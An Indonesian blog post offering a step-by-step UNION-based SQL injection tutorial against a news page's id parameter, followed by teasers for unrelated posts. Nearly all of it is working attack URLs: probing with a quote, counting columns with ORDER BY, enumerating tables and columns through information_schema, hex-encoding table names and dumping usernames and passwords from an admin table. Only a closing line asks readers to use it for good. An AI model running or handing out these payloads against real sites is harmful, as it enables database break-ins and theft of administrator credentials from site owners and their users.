Langsung ke konten utama

Mengenal Lebih Dekat Dengan SQL Injection Part 2


TEKHNIK SQL INJECTION
Disini kita akan mengenal lebih dekat tekhnik SQL Injection pada sebuah sistem. Jika dalam sebuah website dimana ketika dimasukan special karakter seperti singgle quote (') mengalami error maka website tersebut dikatakan memiliki vulnerbilitas (vuln).
INJECTION SQL versi 5
Pada SQL versi ini value dapat di tampilkan melalui pemanggilan pada syntac SQL
Contoh :

==========
=step Satu:=
==========

[site]/berita.php?id=100’
 (ditambahkan single quote) mengalami error maka sistem tersebut dapat di explore
==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
contoh:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
contoh:
[site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi :
[site]/berita.php?id=-100+order+by+8--

===========
=step Tiga:=
===========

Untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka:
[site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

Kita anggap yang keluar angka 5

gunakan perintah “version()” atau “@@version” untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal:
[site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

Untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.tables-- >>> dimasukan setelah angka terakhir



Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

Kita anggap table yang muncul adalah "admin"


===========
=step Lima:=
===========

Untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database()-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--

=============
= step Enam: =
=============

Perintah group_concat(column_name) >>> dimasukan pada angka yang sebelumnya
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0xhexa--

Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm
Banyak juga tools yang dapat mengkonversi bilangan hexa ini. Contoh : hexeditor, hex calculator, dll

Contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema .columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

Memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

Perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

Sampai disini kita sudah mendapatkan isi dari database yang kita inginkan.

 inget  ini untuk versi 5, untuk versi 4 berbeda metode, 

Gunakan ilmu yang di peroleh unuk kebaikan jangan buat ngisengin orang lain yah ^_^


Komentar

Posting Komentar

Postingan populer dari blog ini

Mengenal Karakteristik Dan Siklus Hidup worm , virus, trojan horse, ataupun malcode lainnya

pada umumnya worm memiliki kemampuan dasar sebagai berikut : 1.        KEMAMPUAN REPRODUKSI DAN DISTRIBUSI Yaitu kemampuan yang mutlak dimiliki oleh worm untuk membuat salinan dirinya sendiri, sekaligus mendistribusikan salinan tersebut pada system yang lain baik   melalui media penyimpanan   seperti flasdisk, disket dll, maupun melalui jaringan komputer, walau pun memiliki rutin untuk menginfeksi program lain namun tidak bertujuan menjadikan file program terinfeksi sebagi file infektor. Pada awalnya wor dibuat dengan aksi memnuhi hardisk dan jaringan, namun seiringnya perkembangan jaman   dan teknologi informasi hal ini di tinggalkan oleh para worm writter   karena malah akan mengurangi kemampuan worm itu sendiri dalam menyembunyikan dirinya sendiri, yang akan berakibat worm tersebut cepat terendus oleh advance user ataupun oleh para vendor pembuat anti virus. 1.        KEMAMPUAN REKAYASA SOSIAL Karena file infektor akan aktif saat user meng esekusi maka social engenering at
5 komentar
Baca selengkapnya

Contoh Rewrite Rule

melanjutkan post yang sebelumnya mengenai penyerderhanaan  link di website Sedikit aja Nih Gan Silakan di simak... RewriteEngine on RewriteRule ^home$ media.php?module=home [L] RewriteRule ^galeri-(.*)\.html$ zoom.php?id=$1 [L] RewriteRule ^album-(.*)\.html$ media.php?module=detailalbum&id=$1 [L] RewriteRule ^berita-(.*)\.html$ media.php?module=detailberita&id=$1 [L] RewriteRule ^agenda-(.*)\.html$ media.php?module=detailagenda&id=$1 [L] RewriteRule ^hasil-pencarian\.html$ media.php?module=hasilcari&id=$1 [L] RewriteRule ^indeks-berita\.html$ media.php?module=indeksberita&id=$1 [L] RewriteRule ^hasil-poling\.html$ media.php?module=hasilpoling&id=$1 [L] RewriteRule ^lihat-poling\.html$ media.php?module=lihatpoling&id=$1 [L] RewriteRule ^profil-kami\.html$ media.php?module=profilkami&id=$1 [L] RewriteRule ^tentang\.html$ media.php?module=tentang&id=$28 [L] RewriteRule ^hubungi-kami\.html$ media.php?module=hubungikami&id=$1 [L] Rewri
Posting Komentar
Baca selengkapnya

Sekilas tentang ACL form Windows 7 untuk kebutuhan Audit Berbasis Komputer

ACL for Windows dirancang khusus untuk menganalisa data dan menghasilkan laporan audit untuk user non-teknis sampai expert users. Dengan menggunakan ACL, pekerjaan auditing akan jauh lebih cepat dibandingkan proses auditing manual yang memerlukan waktu sampai berjam-jam bahkan sampai berhari-hari. Dengan beberapa kemampuan ACL, analisis data akan lebih efisien dan lebih meyakinkan. Berikut ini beberapa kemampuan ACL : 1.       Mudah dalam penggunaan . ACL for Windows, sesuai dengan namanya adalah software berbasis windows, dimana sistem operasi windows telah dikenal User Friendly (mudah digunakan). Kemudahan ini ditunjukkan dengan user hanya melakukan click pada gambar-gambar tertentu (icon) untuk melakukan suatu pekerjaan, dan didukung pula dengan fasilitas Wizard untuk mendefinisikan data yang akan dianalisis. 2.       Built-in audit dan analisis data secara fungsional . ACL for Windows didukung dengan kemampuan analisis untuk keperluan audit/pemeriksaan seperti : Analisis Statisti
Posting Komentar
Baca selengkapnya